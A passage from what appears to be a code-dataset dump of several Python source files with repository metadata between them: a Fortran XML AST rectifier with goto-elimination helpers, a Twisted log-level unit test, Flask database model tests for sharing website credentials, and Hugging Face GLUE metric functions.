{"operator": operator})
operand_elem = ET.SubElement(operation_elem, "operand")
self.generate_name_element(operand_elem, "false", name, "false", "1",
"ambiguous")
def generate_name_element(self, parent, hasSubscripts, name_id, is_array,
numPartRef, name_type):
"""This is a function for generating new name element based on
the provided arguments.
Args:
parent (:obj: 'ET'): Parent element object.
hasSubscripts (str): "true" or "false" status in string.
name_id (str): Name of a variable.
numPartRef (str): Number of references.
type (str): Type of a variable.
Returns:
None.
"""
name_attribs = {
"hasSubscripts": hasSubscripts,
"id": name_id,
"is_array": is_array,
"numPartRef": numPartRef,
"type": name_type,
}
name_elem = ET.SubElement(parent, "name", name_attribs)
def generate_if_element(
self, header, parent, stored_stmts, next_goto,
need_operation, op_type, lhs, rhs, operator,
traverse, reconstructed_goto_elem
):
"""This is a function generating new if element.
Since header can hold unary, multiary, or name, some arguments
may be passed with None. Check them to generate an appropriate XML.
Args:
header (:obj: 'ET'): Header element from if.
parent (:obj: 'ET'): Parent element object.
stored_stmts (list): List of statements.
next_goto (list): Other gotos that appear while
handling the current goto stmt.
need_operation (bool): Boolean to state whether
new if needs operation header.
op_type (str): Operation type.
lhs (str): Left hand side variable name.
rhs (str): Right hand side variable name.
operator (str): Operator.
traverse (int): Current traverse counter.
reconstructed_goto_elem (list): A list to
hold reconstructed AST after goto elimination.
Returns:
None.
"""
goto_nest_if_elem = ET.SubElement(parent, "if", {"parent":parent.attrib['parent']})
header_elem = ET.SubElement(goto_nest_if_elem, "header")
if need_operation:
if header is None:
self.generate_operation_element(header_elem, op_type, operator,
lhs)
else:
for stmt in header:
operation_elem = ET.SubElement(header_elem, stmt.tag,
stmt.attrib)
self.parseXMLTree(stmt, operation_elem, header_elem,
goto_nest_if_elem, traverse)
else:
self.generate_name_element(header_elem, "false", lhs, "false", "1",
"variable")
# Generate AST for statements that will be nested under if (!cond) or (cond)
label = None
statement_num = 0
label_before_within_scope = False
body_elem = ET.SubElement(goto_nest_if_elem, "body")
for stmt in stored_stmts:
if len(stmt) > 0:
if "skip-collect" in stmt.attrib:
parent_scope = stmt.attrib['parent-goto']
if parent_scope in self.goto_label_with_case:
if self.goto_label_with_case[parent_scope] == "before":
goto_nest_if_elem.attrib['label'] = parent_scope
self.encapsulate_under_do_while = True
else:
if (
"next-goto" not in stmt.attrib
or (
"lbl" in stmt.attrib
and stmt.attrib['lbl'] == self.current_label
)
):
if "goto-move" in stmt.attrib and not label_before_within_scope:
if "target-label-statement" in stmt.attrib:
del stmt.attrib['goto-move']
del stmt.attrib['target-label-statement']
label_before_within_scope = True
# If the label for a label-before case is the first statement,
# we want to mark this entire if-statement to indicate that it
# needs to be encapsulated within a do-while
if statement_num == 0:
self.encapsulate_under_do_while = True
# Reinitialize counter to 0 to count the number of gotos
# only within the current scope
self.statements_to_reconstruct_before['count-gotos'] = 0
self.statements_to_reconstruct_before['stmts-follow-label'] = []
self.current_label = stmt.attrib['label']
if label_before_within_scope:
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(stmt)
for child in stmt:
if child.tag == "label":
label = child.attrib['lbl']
if self.current_label == label:
if self.encapsulate_under_do_while:
goto_nest_if_elem.attrib[
'label'] = label
if child.tag == "goto-stmt":
# If the current goto-stmt label is equal to the scope label,
# it means the end of the scope has been reached and we are ready to reconstruct
if self.current_label == child.attrib['target_label']:
self.statements_to_reconstruct_before['count-gotos'] += 1
# Since we are going to handle the first label-before
# case, remove the label lbl from the list
del self.goto_target_lbl_before[0]
label_before_within_scope = False
self.current_label = None
reconstruct_target = self.statements_to_reconstruct_before
self.reconstruct_goto_before_label(
body_elem, traverse,
reconstruct_target)
# Else, a new goto-stmt was found that is nested within the current
# label_before case scope, so we need to update its parent
else:
stmt.attrib['parent-goto'] = self.current_label
else:
cur_elem = ET.SubElement(body_elem, stmt.tag,
stmt.attrib)
if "goto-remove" in cur_elem.attrib:
del cur_elem.attrib['goto-remove']
for child in stmt:
child_elem = ET.SubElement(cur_elem, child.tag,
child.attrib)
if len(child) > 0:
self.parseXMLTree(child, child_elem,
cur_elem, parent,
traverse)
else:
if need_operation:
goto_stmt = {}
goto_stmt['statement'] = stmt
for child in stmt:
assert (
child.tag == "goto-stmt"
), f"Must only store <goto-stmt> in next_goto['goto-stmt']. Current: <{child.tag}>."
if child.attrib[
'target_label'] in self.goto_target_lbl_before:
goto_stmt['statement'].attrib[
'goto-move'] = "true"
if (
child.attrib[
'target_label'] not in self.goto_target_lbl_after
and "goto-move" in goto_stmt['statement']
):
del goto_stmt['statement'].attrib['goto-move']
goto_stmt['goto-stmt'] = child
next_goto.append(goto_stmt)
statement_num += 1
if (
self.encapsulate_under_do_while
and (
(
goto_nest_if_elem.attrib['parent'] != "program"
and self.outward_move
)
or (
goto_nest_if_elem.attrib['parent'] == "program"
and not self.outward_move
)
)
):
goto_nest_if_elem.attrib['goto-move'] = "true"
reconstructed_goto_elem.append(goto_nest_if_elem)
parent.remove(goto_nest_if_elem)
#################################################################
# #
# MISCELLANEOUS #
# #
#################################################################
def clean_derived_type_ref(self, current):
"""This function will clean up the derived type referencing syntax,
which is stored in a form of "id='x'%y" in the id attribute.
Once the id gets cleaned, it will call the
reconstruc_derived_type_ref function to reconstruct and replace the
messy version of id with the cleaned version.
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
current_id = current.attrib[
"id"
] # 1. Get the original form of derived type id, which is in a form of,
# for example, id="x"%y in the original XML.
self.derived_type_var_holder_list.append(
self.clean_id(current_id)
) # 2. Extract the first variable name, for example, x in this case.
percent_sign = current_id.find(
"%"
) # 3. Get the location of the '%' sign.
self.derived_type_var_holder_list.append(
current_id[percent_sign + 1: len(current_id)]
) # 4. Get the field variable. y in this example.
self.reconstruct_derived_type_ref(current)
def clean_id(self, unrefined_id):
"""This function refines id (or value) with quotation
marks included by removing them and returns only
the variable name. For example, from "OUTPUT"
to OUTPUT and "x" to x.
Thus, the id name will be modified as below:
Unrefined id - id = ""OUTPUT""
Refined id - id = "OUTPUT"
Args:
unrefined_id (str): Id of name element that holds
unnecessary strings.
Returns:
str: The refined id without quotation marks.
"""
return re.findall(r"\"([^\']+)\"", unrefined_id)[0]
def clean_attrib(self, current):
"""The original XML elements holds 'eos' and
'rule' attributes that are not necessary
and being used. Thus, this function will
remove them in the rectified version of
XML.
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
if "eos" in current.attrib:
current.attrib.pop("eos")
if "rule" in current.attrib:
current.attrib.pop("rule")
def boundary_identifier(self):
"""This function will be called to identify the boundary
for each goto-and-label. The definition of scope here is
that whether one goto-label is nested under another goto-label.
For example:
<label with lbl = 111>
____<goto-stmt with lbl = 222>
____<label with lbl = 222>
<goto-stmt with lbl = 111>
In this case, "goto-label with lbl = 222" is within
the scope of "lbl = 111"
Thus, the elements will be assigned with "parent-goto" attribute with 111.
Args:
None.
Returns:
None.
"""
boundary = {}
lbl_counter = {}
goto_label_in_order = []
goto_and_labels = self.encountered_goto_label
for lbl in goto_and_labels:
if lbl not in lbl_counter:
lbl_counter[lbl] = 1
else:
lbl_counter[lbl] += 1
# Identify each label's parent label (scope)
if not goto_label_in_order:
goto_label_in_order.append(lbl)
else:
if lbl not in goto_label_in_order:
parent = goto_label_in_order[-1]
boundary[lbl] = parent
goto_label_in_order.append(lbl)
# Since the relationship between label and goto-stmt is 1:M,
# find the label that has multiple goto-stmts,
# because the extra <goto-stmt> creates an extra scope that
# encapsulates other 'label-goto' or 'goto-label' pairs.
for lbl in goto_label_in_order:
if lbl not in boundary:
for label, counter in lbl_counter.items():
if counter > 1 and counter % 2 > 0:
boundary[lbl] = label
# This will check for the handled goto cases.
# If any unhandled case is encountered, it will
# assert and report an error. Otherwise, it returns nothing.
self.case_availability(boundary)
boundary_for_label = boundary.copy()
self.parent_goto_assigner (
boundary, boundary_for_label,
self.statements_to_reconstruct_before['stmts-follow-label']
)
self.parent_goto_assigner (
boundary, boundary_for_label,
self.statements_to_reconstruct_after['stmts-follow-goto']
)
self.parent_goto_assigner (
boundary, boundary_for_label,
self.statements_to_reconstruct_after['stmts-follow-label']
)
def update_function_arguments(self, current):
"""This function handles function definition's
arguments with array status based on the information
that was observed during the function call
Args:
current (:obj: 'ET'): Current node (either call or value)
Returns:
None.
"""
fname = current.attrib['fname']
if fname in self.arguments_list:
callee_arguments = self.arguments_list[fname]
for arg in callee_arguments:
# self.caller_arr_arguments holds any element
# only when arrays are being passed to functions
# as arguments. Thus, we first need to check if
# callee function name exists in the list
if (
fname in self.caller_arr_arguments
and arg.attrib['name'] in self.caller_arr_arguments[fname]
):
arg.attrib['is_array'] = "true"
else:
arg.attrib['is_array'] = "false"
# re-initialize back to initial values
self.call_function = False
def update_call_argument_type(self, current, update, scope, arguments_info):
"""This function updates call statement function argument xml
with variable type."""
if (
(current.tag == "name"
and update)
and (scope in self.variables_by_scope
and current.attrib['id'] in self.variables_by_scope[scope])
):
current.attrib['type'] = self.variables_by_scope[scope][current.attrib['id']]
arguments_info.append(current.attrib['type'])
elif current.tag == "literal":
if current.attrib['type'] in TYPE_MAP:
type_info = TYPE_MAP[current.attrib['type']]
else:
type_info = current.attrib['type']
arguments_info.append(type_info)
for child in current:
if current.tag == "subscript":
update = True
self.update_call_argument_type(child, update, scope, arguments_info)
def replace_interface_function_to_target(self, current, arguments_info):
"""This function will check whether replacing function name is needed
or not. That is if the Fortran source code has module with interface
and does dynamic dispatching to functions."""
cur_function = current.attrib['fname'].lower()
target_function = None
for module in self.used_modules:
if module in self.module_summary:
interface_funcs = self.module_summary[module]['interface_functions']
if cur_function in interface_funcs:
interface_func_list = interface_funcs[cur_function]
for func in interface_func_list:
function_args = interface_func_list[func]
found_target_function = False
if len(arguments_info) == len(function_args):
i = 0
# a: argument, t: type
for a, t in function_args.items():
if t == arguments_info[i].lower():
found_target_function = True
else:
found_target_function = False
break
i += 1
# If target function was found in the interface function list,
# modify the current <call> element name and its child <name>
# element id with the target function name from the interface name.
if found_target_function:
# The order of modifying is important.
# MUST modify child element <name> first before modifying
# current <call>.
for elem in current:
if (
elem.tag == "name"
and elem.attrib['id'] == current.attrib['fname']
):
elem.attrib['id'] = func
for subElem in elem:
if subElem.tag == "subscripts":
subElem.attrib['fname'] = func
current.attrib['fname'] = func
#################################################################
# #
# GOTO ELIMINATION HELPER FUNCTIONS #
# #
#################################################################
def case_availability(self, boundary):
"""This function checks for the goto cases in the code based
on the boundary. If any unhandled case encountered, then it
will assert and halt the program.
Args:
boundary (dict): A dictonary of goto label
and boundary label.
Returns:
None.
"""
# Case check for more than double nested goto case
nested_gotos = {}
root_boundary = None
current_boundary = None
for goto, goto_boundary in boundary.items():
if current_boundary is None:
current_boundary = goto
root_boundary = goto
nested_gotos[root_boundary] = 1
else:
if goto_boundary == current_boundary:
nested_gotos[root_boundary] += 1
assert (
nested_gotos[root_boundary] <= 2
), "We do not handle more than 2 nested goto cases at this moment."
else:
root_boundary = goto
nested_gotos[root_boundary] = 1
current_boundary = goto
# All cases are currently handled
return
def parent_goto_assigner(self, boundary, boundary_for_label,
statements_to_reconstruct
):
"""This function actually assigns boundary(s) to each goto
and label statements.
Args:
boundary (dict): A dictionary mapping each goto label to its parent boundary label.
boundary_for_label (dict): A dictionary of
label as a key and its parent boundary label.
statements_to_reconstruct (list): A list of
statements that require reconstruction.
Returns:
None.
"""
for stmt in statements_to_reconstruct:
if "goto-stmt" in stmt.attrib:
target_lbl = stmt.attrib['lbl']
if target_lbl in boundary:
stmt.attrib['parent-goto'] = boundary[target_lbl]
del boundary[target_lbl]
else:
stmt.attrib['parent-goto'] = "none"
if "target-label-statement" in stmt.attrib:
label = stmt.attrib['label']
if label in boundary_for_label:
stmt.attrib['parent-goto'] = boundary_for_label[label]
del boundary_for_label[label]
else:
stmt.attrib['parent-goto'] = "none"
def remove_dup_stmt(self, stmts_follow_label):
"""This removes the statement that's a child statement of
if body being seprately re-added to the list.
Args:
stmts_follow_label (:obj: 'ET'): A list that holds
statements appeard under the label-statement for
reconstruction.
Returns:
None.
"""
prev_stmt = None
for stmt in stmts_follow_label:
if prev_stmt is not None:
# This statement always appears right before
# the if-statement, so check this condition
# and remove it from the list.
if (
stmt.tag == "if"
and (prev_stmt.tag == "statement"
and prev_stmt.attrib['body-level'] == "if")
):
stmts_follow_label.remove(prev_stmt)
prev_stmt = stmt
def boundary_identifier_for_backward_goto(
self, stmts_follow_label, goto_index_holder,
number_of_gotos, target_label_lbl
):
"""This function identifies the boundary from label to goto.
Remove any statements that are not within the boundary.
Then, store those removed statements separately for later
restoration.
Args:
stmts_follow_label (list): A list holding the
statements that appear after the label-statement
for reconstruction.
goto_index_holder (list): A list of index of goto
in the stmts_follow_label.
number_of_gotos (int): Number of gotos in the
stmts_follow_label.
target_label_lbl (list): A single-value list that
holds the label-stmt's label value.
Returns:
(list): A list of statements that requires
restoration after loop generation.
"""
index = 0
goto_counter = 0
for stmt in stmts_follow_label:
if (
index == 0
and "label" in stmt.attrib
):
target_label_lbl[0] = stmt.attrib['label']
for child in stmt:
if (
child.tag == "goto-stmt"
and child.attrib['target_label'] == target_label_lbl[0]
):
goto_counter += 1
goto_index_holder.append(index)
if goto_counter == number_of_gotos:
break
index += 1
statements_to_recover = stmts_follow_label[index+1:len(stmts_follow_label)]
for stmt in statements_to_recover:
if (
stmt.tag == "if"
and "conditional-goto-stmt-lbl" in stmt.attrib
):
statements_to_recover.remove(stmt)
del stmts_follow_label[index + 1:len(stmts_follow_label)]
return statements_to_recover
def multiple_goto_identifier(
self, goto_index_holder,
multiple_goto_stmts, stmts_follow_label
):
"""This function identifies any additional goto
statements may appear within the boundary of
currently handling backward goto case.
Args:
stmts_follow_label (list): A list holding the
statements that appear after the label-statement
for reconstruction.
goto_index_holder (list): A list of index of goto
in the stmts_follow_label.
multiple_goto_stmts (list): A list that will hold
additional gotos within the boundary of current
goto.
Returns:
None.
"""
for i in range(len(goto_index_holder)):
if i == 0:
multiple_goto_stmts.append(
stmts_follow_label[0:goto_index_holder[i] + 1]
)
else:
if i + 1 < len(goto_index_holder):
multiple_goto_stmts.append(
stmts_follow_label[
goto_index_holder[i - 1] + 1:goto_index_holder[
i + 1] + 1]
)
else:
multiple_goto_stmts.append(
stmts_follow_label[
goto_index_holder[i - 1] + 1:goto_index_holder[-1] + 1]
)
def nested_forward_goto_identifier(self, multiple_goto_stmts):
"""This function identifies any existing forward
goto case nested under the backward goto case.
Args:
multiple_goto_stmts (list): A list that will hold
additional gotos within the boundary of the current
goto. (index_boundary is a local list that records
the indices bounding the nested <goto-stmt> and <label>.)
Returns:
(bool): A boolean status indicating whether the
nested forward goto exists within the boundary.
"""
labels = []
index_boundary = []
nested_gotos_exist = False
for goto in multiple_goto_stmts:
index = 0
main_loop_lbl = goto[0].attrib['label']
label_after_lbl = None
for stmt in goto:
if "label" in stmt.attrib:
labels.append(stmt.attrib["label"])
if stmt.attrib["label"] == label_after_lbl:
index_boundary.append(index)
if "goto-stmt" in stmt.attrib:
if (
main_loop_lbl != stmt.attrib['lbl']
and stmt.attrib['lbl'] not in labels
):
nested_gotos_exist = True
label_after_lbl = stmt.attrib['lbl']
index_boundary.append(index)
index += 1
return nested_gotos_exist
def construct_goto_loop(
self, parent, reconstruct_target, nested_gotos_exist,
multiple_goto_stmts, number_of_gotos, declared_label_flag_num,
traverse, target_label_lbl
):
"""This function constructs loop syntax tree for goto
backward case.
Args:
parent (:obj: 'ET'): Parent element of loop.
reconstruct_target (dict): A dictionary that
will hold nested goto statement.
nested_gotos_exist (bool): Boolean indicating
whether a nested goto exists or not.
multiple_goto_stmts (list): A list of goto and other
statements.
number_of_gotos (int): Number of gotos to reconstruct.
declared_label_flag_num (list): List of flag numbers.
traverse (int): Current traverse counter.
target_label_lbl (list): A single value list that
holds the label value of <label>.
Returns:
None.
"""
cur_elem_parent = parent
current_goto_num = 1
end_of_current_goto_loop = False
for i in range(number_of_gotos):
loop_elem = ET.SubElement(cur_elem_parent, "loop",
{"type": "do-while"})
header_elem = ET.SubElement(loop_elem, "header")
# The outermost flag == N and the innermost flag == 1
flag_num = declared_label_flag_num[i]
name = f"label_flag_{str(flag_num)}"
name_attrib = {
"hasSubscripts": "false",
"id": name,
"type": "ambiguous",
}
name_elem = ET.SubElement(header_elem, "name", name_attrib)
flag_name = name
body_elem = ET.SubElement(loop_elem, "body")
# Keep track of the parent and grandparent elements
grand_parent_elem = cur_elem_parent
cur_elem_parent = body_elem
# Since reconstruction of multiple gotos is done from the outermost
# to the innermost, we do not construct any subelements until
# all encapsulating loops are created first
if current_goto_num == number_of_gotos:
for statements in multiple_goto_stmts:
index = 0
for stmt in statements:
if len(stmt) > 0:
if nested_gotos_exist:
self.nested_goto_handler(
reconstruct_target, statements,
body_elem, traverse
)
nested_gotos_exist = False
else:
elems = ET.SubElement(
body_elem, stmt.tag, stmt.attrib
)
for child in stmt:
if (
child.tag == "goto-stmt"
and target_label_lbl[0] ==
child.attrib['target_label']
):
# Conditional
if "conditional-goto-stmt" in stmt.attrib:
self.generate_assignment_element(
elems, flag_name,
self.conditional_op, None, None,
traverse
)
# Unconditional
else:
self.generate_assignment_element(
elems, flag_name, None,
"literal", "true", traverse
)
end_of_current_goto_loop = True
else:
child_elem = ET.SubElement(
elems, child.tag, child.attrib
)
if len(child) > 0:
self.parseXMLTree(
child, child_elem, elems,
parent, traverse
)
# If end_of_current_goto_loop is True,
# escape one loop level out to continue
# constructing statements
if end_of_current_goto_loop:
body_elem = grand_parent_elem
end_of_current_goto_loop = False
flag_name = f"label_flag_" \
f"{str(number_of_gotos + i - 1)}"
index += 1
else:
current_goto_num += 1
def nested_goto_handler(
self, reconstruct_target, statements,
body_elem, traverse
):
"""This function collects forward goto case
related statements under the backward goto
boundary. Then, it calls goto_after function
to reconstruct goto.
Args:
reconstruct_target (list): A list that holds
statements for reconstruction.
statements (:obj: 'ET'): Statements for
reconstructions.
body_elem (:obj: 'ET'): Body element of
the loop.
traverse (int): Current traverse counter.
Returns:
None.
"""
reconstruct_target['stmts-follow-goto'] \
= statements[index_scope[0]:index_scope[1]]
reconstruct_target['stmts-follow-label'] \
= statements[index_scope[1]]
reconstruct_target['count-gotos'] \
= 1
self.reconstruct_goto_after_label(
body_elem, traverse, reconstruct_target
)
self.statements_to_reconstruct_after[
'stmts-follow-goto'] = []
def statement_recovery(self, statements_to_recover, parent, traverse):
"""This function is for recovering any existing statements
that follow the reconstructed loop.
Args:
statements_to_recover (list): A list of statements.
parent (:obj: 'ET'): A prent element.
traverse (int): Current traverse counter.
"""
for recover_stmt in statements_to_recover:
statement = ET.SubElement(
parent, recover_stmt.tag, recover_stmt.attrib
)
for child in recover_stmt:
child_elem = ET.SubElement(
statement, child.tag, child.attrib
)
if len(child) > 0:
self.parseXMLTree(
child, child_elem, statement, parent, traverse
)
#################################################################
# #
# NON-CLASS FUNCTIONS #
# #
#################################################################
def is_empty(elem):
"""This function is just a helper function for
check whether the passed elements (i.e. list)
is empty or not
Args:
elem (:obj:): Any structured data object (i.e. list).
Returns:
bool: True if element is empty or false if not.
"""
return not elem
def indent(elem, level=0):
"""This function indents each level of XML.
Source:
https://stackoverflow.com/questions/3095434/inserting-newlines
-in-xml-file-generated-via-xml-etree-elementstree-in-python
Args:
elem (:obj: 'ET'): An XML root.
level (int): A root level in integer.
Returns:
None.
"""
i = "\n" + level * " "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
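# Minimal usage sketch for indent() (illustrative only, not part of the
# rectifier pipeline): it mutates the tree in place so that serialization
# produces human-readable, indented XML, e.g.
#   root = ET.Element("program")
#   stmt = ET.SubElement(root, "statement")
#   ET.SubElement(stmt, "assignment")
#   indent(root)
#   ET.tostring(root).decode()
# yields output along the lines of
#   '<program>\n  <statement>\n    <assignment />\n  </statement>\n</program>\n'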
def buildNewASTfromXMLString(
xmlString: str,
original_fortran_file: str,
module_log_file_path: str
) -> Tuple[ET.Element, List]:
"""This function processes OFP generated XML and generates a rectified
version by recursively calling the appropriate functions.
Args:
xmlString (str): XML as a string
original_fortran_file (str): Path to the original Fortran file
module_log_file_path (str): Path to the module_log_file
Returns:
Tuple[ET.Element, List]: The reconstructed root element and the
list of module files to process.
"""
xml_generator = RectifiedXMLGenerator()
# We need the absolute path of Fortran file to lookup in the modLogFile.json
xml_generator.original_fortran_file_abs_path = \
os.path.abspath(original_fortran_file)
xml_generator.module_log_file_path = module_log_file_path
traverse = 1
ofpAST = ET.XML(xmlString)
# A root of the new AST
newRoot = ET.Element(ofpAST.tag, ofpAST.attrib)
# First add the root to the new AST list
for child in ofpAST:
# Handle only non-empty elements
if child.text:
cur_elem = ET.SubElement(newRoot, child.tag, child.attrib)
xml_generator.parseXMLTree(child, cur_elem, newRoot, newRoot, traverse)
# Indent and structure the tree properly
tree = ET.ElementTree(newRoot)
indent(newRoot)
# Check whether the rectified AST requires goto elimination;
# if it does, do another traversal to eliminate the gotos and
# reconstruct the AST once more
while (xml_generator.need_goto_elimination):
oldRoot = newRoot
traverse += 1
xml_generator.boundary_identifier()
newRoot = ET.Element(oldRoot.tag, oldRoot.attrib)
for child in oldRoot:
if child.text:
cur_elem = ET.SubElement(newRoot, child.tag, child.attrib)
xml_generator.parseXMLTree(child, cur_elem, newRoot, newRoot,
traverse)
tree = ET.ElementTree(newRoot)
indent(newRoot)
if not xml_generator.continue_elimination:
xml_generator.need_goto_elimination = False
return newRoot, xml_generator.module_files_to_process
def parse_args():
"""This function parse the arguments passed to the script.
It returns a tuple of (input ofp xml, output xml)
file names.
Args:
None.
Returns:
None.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-f",
"--file",
nargs="+",
help="OFP generated XML file needs to be passed.",
)
parser.add_argument(
"-g",
"--gen",
nargs="+",
help="A rectified version of XML.",
)
args = parser.parse_args(sys.argv[1:])
if (
args.file is not None
and args.gen is not None
):
ofpFile = args.file[0]
rectifiedFile = args.gen[0]
else:
assert (
False
), f"[[ Missing either input or output file.\
Input: {args.file}, Output: {args.gen} ]]"
return (ofpFile, rectifiedFile)
def fileChecker(filename, mode):
"""This function checks for the validity (file existence and
mode). If either the file does not exist or the mode is
not valid, throws an IO exception and terminates the program
Args:
filename (str): A file name that reconstructed XMl
will be written to.
mode (str): Mode to open the file in.
Returns:
None.
"""
try:
with open(filename, mode) as f:
pass
except IOError:
assert (
False
), f"File {filename} does not exit or invalid mode {mode}."
if __name__ == "__main__":
(ofpFile, rectifiedFile) = parse_args()
# Since we pass the file name to the ElementTree
# parser rather than opening it with the open function,
# we check its validity before the file name
# is actually passed to the parser
fileChecker(ofpFile, "r")
ofpXML = ET.parse(ofpFile)
ofpXMLRoot = ofpXML.getroot()
# Converts the XML tree into string
ofpXMLStr = ET.tostring(ofpXMLRoot).decode()
# Call buildNewASTfromXMLString to rectify the XML
rectifiedXML = buildNewASTfromXMLString(ofpXMLStr)
rectifiedTree = ET.ElementTree(rectifiedXML)
# The write function is used with the generated
# XML tree object, not with the file object. Thus,
# as with ofpFile, we check the validity
# of the file before passing it to the ET tree object's
# write function
fileChecker(rectifiedFile, "w")
rectifiedTree.write(rectifiedFile)
| 40.388869
| 145
| 0.493026
|
8b98168c036790f54815ab801947e54f490fb585
| 896
|
py
|
Python
|
twisted/python/logger/test/test_levels.py
|
ioggstream/twisted
|
34f9b1e3f097685839000c656332c66ee85be5d8
|
[
"Unlicense",
"MIT"
] | null | null | null |
twisted/python/logger/test/test_levels.py
|
ioggstream/twisted
|
34f9b1e3f097685839000c656332c66ee85be5d8
|
[
"Unlicense",
"MIT"
] | null | null | null |
twisted/python/logger/test/test_levels.py
|
ioggstream/twisted
|
34f9b1e3f097685839000c656332c66ee85be5d8
|
[
"Unlicense",
"MIT"
] | null | null | null |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for L{twisted.python.logger._levels}.
"""
from twisted.trial import unittest
from .._levels import InvalidLogLevelError
from .._levels import LogLevel
class LogLevelTests(unittest.TestCase):
"""
Tests for L{LogLevel}.
"""
def test_levelWithName(self):
"""
Look up log level by name.
"""
for level in LogLevel.iterconstants():
self.assertIdentical(LogLevel.levelWithName(level.name), level)
def test_levelWithInvalidName(self):
"""
You can't make up log level names.
"""
bogus = "*bogus*"
try:
LogLevel.levelWithName(bogus)
except InvalidLogLevelError as e:
self.assertIdentical(e.level, bogus)
else:
self.fail("Expected InvalidLogLevelError.")
| 22.974359
| 75
| 0.628348
|
b27a074872adfa7fb1c466bd946d8075231d04f5
| 1,387
|
py
|
Python
|
app/models_tests.py
|
codingbreak/account-sharing-proxy-server
|
e572da9ac867897079479ce97daeee14ae373ab5
|
[
"MIT"
] | 3
|
2021-09-15T16:15:54.000Z
|
2022-01-25T05:38:53.000Z
|
app/models_tests.py
|
codingbreak/account-sharing-proxy-server
|
e572da9ac867897079479ce97daeee14ae373ab5
|
[
"MIT"
] | 5
|
2021-12-28T11:53:17.000Z
|
2022-01-21T14:40:19.000Z
|
app/models_tests.py
|
codingbreak/account-sharing-proxy-server
|
e572da9ac867897079479ce97daeee14ae373ab5
|
[
"MIT"
] | null | null | null |
from flask import g
from database import db, User, Credential, Shared_User
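# Note: the test_app and session fixtures, as well as the database module,
# are assumed to be provided by the surrounding project (e.g. pytest fixtures
# in a conftest.py); they are not defined in this file.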
def test_create_user_account(test_app):
with test_app.app_context():
guest = User(username="guest", email="guest@example.com")
db.session.add(guest)
db.session.commit()
assert User.query.filter_by(username="guest").first() == guest
def test_create_credential(session):
guest = User(username="guest", email="guest@example.com")
guest_wsj_cre = Credential(website="https://www.wsj.com/", user=guest)
session.add(guest)
session.add(guest_wsj_cre)
session.commit()
assert (
Credential.query.filter_by(website="https://www.wsj.com/").first()
== guest_wsj_cre
)
def test_share_credential(session):
guest = User(username="guest", email="guest@example.com")
guest_wsj_cre = Credential(website="https://www.wsj.com/", user=guest)
session.add(guest)
session.add(guest_wsj_cre)
session.commit()
guest_friend = User(username="guest_friend", email="guest_friend@example.com")
guest_wsj_cre_to_guest_friend = Shared_User(
credential=guest_wsj_cre, shared_user=guest_friend
)
session.add(guest_friend)
session.add(guest_wsj_cre_to_guest_friend)
session.commit()
assert (
Shared_User.query.filter_by(shared_user=guest_friend).first().credential.user
== guest
)
| 29.510638
| 85
| 0.695746
|
3bb437602dc7c8e6cfc2c0f5eeb123b76da38cb9
| 3,226
|
py
|
Python
|
src/transformers/data/metrics/__init__.py
|
dmlap/transformers
|
79588e6fdb5af8add092fc27dd695ea1ebc68b18
|
[
"Apache-2.0"
] | 77
|
2020-11-12T18:40:25.000Z
|
2022-03-27T06:41:30.000Z
|
src/transformers/data/metrics/__init__.py
|
dmlap/transformers
|
79588e6fdb5af8add092fc27dd695ea1ebc68b18
|
[
"Apache-2.0"
] | 7
|
2021-03-11T14:00:58.000Z
|
2022-01-18T05:51:22.000Z
|
src/transformers/data/metrics/__init__.py
|
dmlap/transformers
|
79588e6fdb5af8add092fc27dd695ea1ebc68b18
|
[
"Apache-2.0"
] | 23
|
2020-12-08T12:42:24.000Z
|
2022-02-11T13:55:24.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from scipy.stats import pearsonr, spearmanr
from sklearn.metrics import matthews_corrcoef, f1_score
_has_sklearn = True
except (AttributeError, ImportError):
_has_sklearn = False
def is_sklearn_available():
return _has_sklearn
if _has_sklearn:
def simple_accuracy(preds, labels):
return (preds == labels).mean()
def acc_and_f1(preds, labels):
acc = simple_accuracy(preds, labels)
f1 = f1_score(y_true=labels, y_pred=preds)
return {
"acc": acc,
"f1": f1,
"acc_and_f1": (acc + f1) / 2,
}
def pearson_and_spearman(preds, labels):
pearson_corr = pearsonr(preds, labels)[0]
spearman_corr = spearmanr(preds, labels)[0]
return {
"pearson": pearson_corr,
"spearmanr": spearman_corr,
"corr": (pearson_corr + spearman_corr) / 2,
}
def glue_compute_metrics(task_name, preds, labels):
assert len(preds) == len(
labels
), f"Predictions and labels have mismatched lengths {len(preds)} and {len(labels)}"
if task_name == "cola":
return {"mcc": matthews_corrcoef(labels, preds)}
elif task_name == "sst-2":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "mrpc":
return acc_and_f1(preds, labels)
elif task_name == "sts-b":
return pearson_and_spearman(preds, labels)
elif task_name == "qqp":
return acc_and_f1(preds, labels)
elif task_name == "mnli":
return {"mnli/acc": simple_accuracy(preds, labels)}
elif task_name == "mnli-mm":
return {"mnli-mm/acc": simple_accuracy(preds, labels)}
elif task_name == "qnli":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "rte":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "wnli":
return {"acc": simple_accuracy(preds, labels)}
elif task_name == "hans":
return {"acc": simple_accuracy(preds, labels)}
else:
raise KeyError(task_name)
def xnli_compute_metrics(task_name, preds, labels):
assert len(preds) == len(
labels
), f"Predictions and labels have mismatched lengths {len(preds)} and {len(labels)}"
if task_name == "xnli":
return {"acc": simple_accuracy(preds, labels)}
else:
raise KeyError(task_name)
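# Usage note (illustrative): preds and labels are expected to be
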